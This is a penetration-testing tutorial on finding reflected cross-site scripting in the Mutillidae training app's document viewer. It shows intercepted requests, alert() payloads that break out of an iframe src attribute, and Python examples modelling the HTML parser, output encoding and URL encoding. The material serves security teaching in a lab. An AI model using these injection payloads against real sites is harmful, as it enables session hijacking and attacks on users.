In my previous article we looked at the different ways of fuzzing, including suffix and prefix fuzzing, and used those techniques to provoke error messages from a web application. Now that we know how to fuzz, we will use that skill to find cross-site scripting, generally known as XSS.
Testing For XSS
Without wasting much time, open the Document Viewer page under the A3 Cross Site Scripting (XSS) module. There are several ways of exploiting XSS on that page, but we will start with the simplest one: input reflected into an HTML attribute.
As soon as you open the page, look at what it offers. In this case we are given four different documents to view. One of the four is a downloadable document from the web application; the other three are displayed in the box below the form.
Leave the selection as it is, submit the form and intercept the request. The intercepted request is as follows:
GET /chintan/index.php?page=document-viewer.php&PathToDocument=documentation%2Fhow-to-access-Mutillidae-over-Virtual-Box-network.php&document-viewer-php-submit-button=View+Document HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/chintan/index.php?page=document-viewer.php&PathToDocument=documentation%2Fhow-to-access-Mutillidae-over-Virtual-Box-network.php&document-viewer-php-submit-button=View+Document
Cookie: showhints=0; PHPSESSID=e0a56snmg2cjhd3dccvar9h3o5
Connection: keep-alive
Looking at the parameters, PathToDocument is the one that selects the content shown in the box. So let us replace its value and fuzz it with the skills from the previous article. First I remove the whole original document path from the request line. Then I put in the plain string ‘jonnybravo’ to see whether the request is still processed successfully or the server gives me an error. Only the first line of the request changes, as follows:
GET /chintan/index.php?page=document-viewer.php&PathToDocument=jonnybravo&document-viewer-php-submit-button=View+Document HTTP/1.1
After forwarding the request I got a 200 OK response from the server. I intercepted the response in Burp Suite as well, so that I could search the HTML of the response page for our input, jonnybravo. There are two matches. That tells me what to keep in mind while crafting the XSS payload: in the first match jonnybravo is just text between quotes, but in the second it is the value of the src (source) attribute of an iframe tag.
We can test for XSS here by crafting a payload with the right prefix and suffix around the jonnybravo input. We cannot execute a payload directly where it lands, in the middle of the iframe's src attribute: we have to break out of that tag and place the payload in the HTML before or after the iframe. Once the payload sits in the HTML outside the iframe, it will execute unless some other protection, such as output encoding or a filter, stops it.
Show Time
Now here is our target, the HTML around our reflected input:
<iframe src="jonnybravo" width="700px" height="500px"></iframe>
First we need to break the context. As you know from HTML, our input sits in src="jonnybravo". To break out of the attribute value we put a double quote in front of it, giving "jonnybravo as input, so that the opening quote of the original code and the quote from our input pair up and the browser sees an empty src value. The code now looks like this:
<iframe src=""jonnybravo" width="700px" height="500px"></iframe>
The iframe tag is still open, so next we close it in order to get our payload outside the iframe. We add the closing tag to our input, which becomes "jonnybravo</iframe>. The code now looks like this:
<iframe src=""jonnybravo</iframe>" width="700px" height="500px"></iframe>
One caveat worth knowing: a browser's tokenizer only leaves the <iframe ...> start tag when it meets a >, and everything before that, including a literal </iframe>, is read as attribute junk rather than as an end tag. The reliable form of the break-out is therefore "> followed by </iframe>; if the alert does not fire with the shorter input, add that >.
As you can see, the iframe is now opened and closed by our input, so we are outside the iframe tag and can put our payload there. We will inject a JavaScript alert: a <script> tag whose body calls alert() with whatever text you want to see pop up (written as ... below). It comes after the input we have built so far, so our new and final input is:
Payload: "jonnybravo</iframe><script>alert(...)</script>
Now the reflected code is as below.
<iframe src=""jonnybravo</iframe><script>alert(...)</script>" width="700px" height="500px"></iframe>
The iframe tag is closed before our payload, so the script runs, and whatever comes after it (the width, the height and the original closing iframe tag) makes no difference: the browser treats that incomplete leftover as stray markup and it does nothing. So I put this input into the request I had intercepted; the new request is as follows.
GET /chintan/index.php?page=document-viewer.php&PathToDocument="jonnybravo</iframe><script>alert(...)</script>&document-viewer-php-submit-button=View+Document HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/chintan/index.php?page=document-viewer.php&PathToDocument=documentation%2Fhow-to-access-Mutillidae-over-Virtual-Box-network.php&document-viewer-php-submit-button=View+Document
Cookie: showhints=0; PHPSESSID=e0a56snmg2cjhd3dccvar9h3o5
Connection: keep-alive
To see what we have achieved so far, let us intercept the response to this request and find where momma lies in the code. From the code you can see that the iframe tag is closed at the point where we supplied </iframe> in our input, and that the script tag we supplied along with it begins on the next line. It is not mandatory to put the " first and jonnybravo after it; you can also craft the payload as follows:
Payload: jonnybravo"</iframe><script>alert(...)</script>
If I give the above payload I get the response shown in the figure below. Here the JavaScript executes and the iframe renders as well: while the alert is showing you will not see the iframe box, but as soon as you click the OK button and the page finishes loading, the iframe box appears, as shown in the figure below.
To verify that it is an iframe, I pressed F12 to see the live markup of the page and used the Inspect Element option; this is not the Firebug add-on but the inspector built into the version of Firefox I am using. It shows the element I am inspecting, and from the HTML it can be confirmed that this is my iframe with jonnybravo as its source.
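To make the context-breaking reasoning above concrete, here is an added Python example; it is not code from the original post or from Mutillidae. It reconstructs the iframe sink from the response excerpt, runs the candidate inputs through a small model of the HTML tokenizer's tag and raw-text rules, and reports which ones put a <script> tag where a browser would execute it; it then applies attribute-context output encoding (the equivalent of PHP's htmlspecialchars with ENT_QUOTES) to show that the same inputs become inert. The sink template, the payload names and the alert text are assumptions. Note what the model shows for the quote-only input: the double quote ends the attribute value, but the tokenizer is still inside the <iframe ...> start tag until it meets a >, so a </iframe> before that > is read as attribute junk; adding the > is what makes the break-out reliable.

```python
import html

# The reflection sink as it appears in the Mutillidae document viewer response
# (reconstructed from the post's excerpt; the attribute order is an assumption).
SINK = '<iframe src="{value}" width="700px" height="500px"></iframe>'

# Candidate inputs for PathToDocument. The alert text "1" is an example choice.
PAYLOADS = {
    # lands inside src="...": never tokenized as a tag
    "inside_attribute": '<script>alert(1)</script>',
    # quote ends the attribute value, but nothing ends the start tag
    "quote_only": '"jonnybravo</iframe><script>alert(1)</script>',
    # quote, then '>' to end the start tag, then the end tag
    "quote_and_gt": '"></iframe><script>alert(1)</script>',
    # same break-out with the text first and the quote after it
    "text_then_quote": 'jonnybravo"></iframe><script>alert(1)</script>',
}


def render_unsafe(value):
    """Reflect the value into the iframe src with no output encoding (the vulnerable sink)."""
    return SINK.format(value=value)


def render_safe(value):
    """Same sink with attribute-context encoding, equivalent to PHP's
    htmlspecialchars($value, ENT_QUOTES): quotes and angle brackets become entities."""
    return SINK.format(value=html.escape(value, quote=True))


def _tag_end(doc, i):
    """Index just past the '>' that ends the tag opening at doc[i] == '<'.

    Follows the HTML tokenizer's tag states: only a '>' outside a quoted attribute
    value ends the tag.  A stray '"' or a literal '</iframe' met while still inside
    the tag is attribute junk, not structure.
    """
    n = len(doc)
    i += 1
    while i < n:
        c = doc[i]
        if c == ">":
            return i + 1
        i += 1
        if c == "=":                                  # an attribute value follows
            while i < n and doc[i] in " \t\r\n":
                i += 1
            if i < n and doc[i] in "\"'":             # quoted value: skip to its close
                close = doc.find(doc[i], i + 1)
                i = n if close == -1 else close + 1
    return n


def script_runs(doc):
    """True if a <script> start tag is tokenized in ordinary document content.

    Two places are inert: inside an attribute value, and inside an iframe element,
    whose body is raw text up to the next </iframe> and is never parsed as markup.
    """
    n = len(doc)
    low = doc.lower()
    i = 0
    while i < n:
        j = low.find("<", i)
        if j == -1:
            return False
        if low.startswith("<script", j):
            return True
        if low.startswith("<iframe", j):
            body = _tag_end(doc, j)                   # skip the start tag and its attributes
            end = low.find("</iframe", body)          # raw-text body: ignore everything in it
            i = n if end == -1 else end
        elif low.startswith("</", j) or doc[j + 1:j + 2].isalpha():
            i = _tag_end(doc, j)                      # any other tag: skip to its '>'
        else:
            i = j + 1                                 # a literal '<' in text
    return False


def assess(render=render_unsafe):
    """Map each payload name to whether it reaches a script-executing position."""
    return {name: script_runs(render(p)) for name, p in PAYLOADS.items()}


if __name__ == "__main__":
    for name, fires in assess().items():
        print(f"unsafe sink   {name:17} -> {'alert fires' if fires else 'inert'}")
    for name, fires in assess(render_safe).items():
        print(f"escaped sink  {name:17} -> {'alert fires' if fires else 'inert'}")
```

Running it prints one line per payload for each sink. In a real test the same check is done by reading the intercepted response, but the encoded sink is the thing to hand to the developer: with quotes and angle brackets turned into entities, no choice of prefix and suffix gets the input out of the attribute.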
“It depends on your HTML skills and your basic knowledge of encoding and decoding special characters. If you know those in depth you can bypass filters; in case you need it, OWASP provides an XSS filter evasion cheat sheet on its official website that explains encoding and decoding techniques along with filter bypass techniques.”
Use Burp Decoder
Often a URL you see is not easy to read or recognize at a glance, because the server may be using an encoding, at least for special characters. If you cannot make sense of a URL, simply paste it into Burp Decoder.
How-To
Encoded URL:
http:%2f%2flocalhost%2Fchintan%2findex.php%3fpage%3ddocument%2dviewer.php%26PathToDocument%3ddocumentation%2Fhow%2dto%2daccess%2dMutillidae%2dover%2dVirtual%2dBox%2dnetwork.php%26document%2dviewer%2dphp%2dsubmit%2dbutton=View+Document
Let us assume we have this URL in encoded form and cannot tell what it says. Copy and paste it into Burp Decoder and click “Smart Decode”; if Burp recognizes the encoding, it decodes the URL. I decoded this URL and its simplified form is as follows:
Decoded URL:
http://localhost/chintan/index.php?page=document-viewer.php&PathToDocument=documentation/how-to-access-Mutillidae-over-Virtual-Box-network.php&document-viewer-php-submit-button=View+Document
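The decode step above, and its inverse (encoding the XSS payload before it goes into the GET request line), as an added Python example that is not part of the original post. It uses only the standard library; the payload and its alert text are example choices, and the stray space in the post's copy of the encoded URL is dropped, since it would not survive a copy into a real request.

```python
from urllib.parse import parse_qs, unquote, urlencode, urlsplit

# The encoded URL from the Burp Decoder section (with the stray space removed).
ENCODED_URL = (
    "http:%2f%2flocalhost%2Fchintan%2findex.php%3fpage%3ddocument%2dviewer.php"
    "%26PathToDocument%3ddocumentation%2Fhow%2dto%2daccess%2dMutillidae%2dover"
    "%2dVirtual%2dBox%2dnetwork.php%26document%2dviewer%2dphp%2dsubmit%2dbutton=View+Document"
)

# Example break-out payload for the iframe src context (the alert text is an example choice).
PAYLOAD = '"></iframe><script>alert(1)</script>'


def decode_url(encoded):
    """What Burp Decoder's URL decode does: turn every %XX (any case) back into its character."""
    return unquote(encoded)


def query_params(url):
    """Split a URL's query string into parameters, decoding %XX and '+' the way the server does."""
    return {k: v[0] for k, v in parse_qs(urlsplit(url).query).items()}


def build_request_line(payload, path="/chintan/index.php"):
    """URL-encode the payload as Burp's encoder (or a browser) would before it goes into
    the GET request: '"', '<', '>', '/', '(' and ')' all become %XX sequences."""
    query = urlencode({
        "page": "document-viewer.php",
        "PathToDocument": payload,
        "document-viewer-php-submit-button": "View Document",
    })
    return f"GET {path}?{query} HTTP/1.1"


def reflected_value(request_line):
    """Recover the PathToDocument value the server will reflect from a request line."""
    target = request_line.split(" ")[1]
    return query_params(target)["PathToDocument"]


if __name__ == "__main__":
    print(decode_url(ENCODED_URL))
    print(query_params(decode_url(ENCODED_URL))["PathToDocument"])
    line = build_request_line(PAYLOAD)
    print(line)
    print(reflected_value(line))
```

The round trip matters in practice: the characters that break the attribute context (", <, >, /) are exactly the ones that must be percent-encoded in the request line, and the server decodes them again before reflecting the value, so what you see in Decoder is what ends up in the page.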
Conclusion
So this is how attackers carry out cross-site scripting (XSS) against a web application: input that the application reflects without encoding ends up running as script in the victim's browser, which is what attackers use to get around its access controls, for example by acting within the victim's session. Whether it works depends on the protections the developer has implemented and on how the application handles the input in question.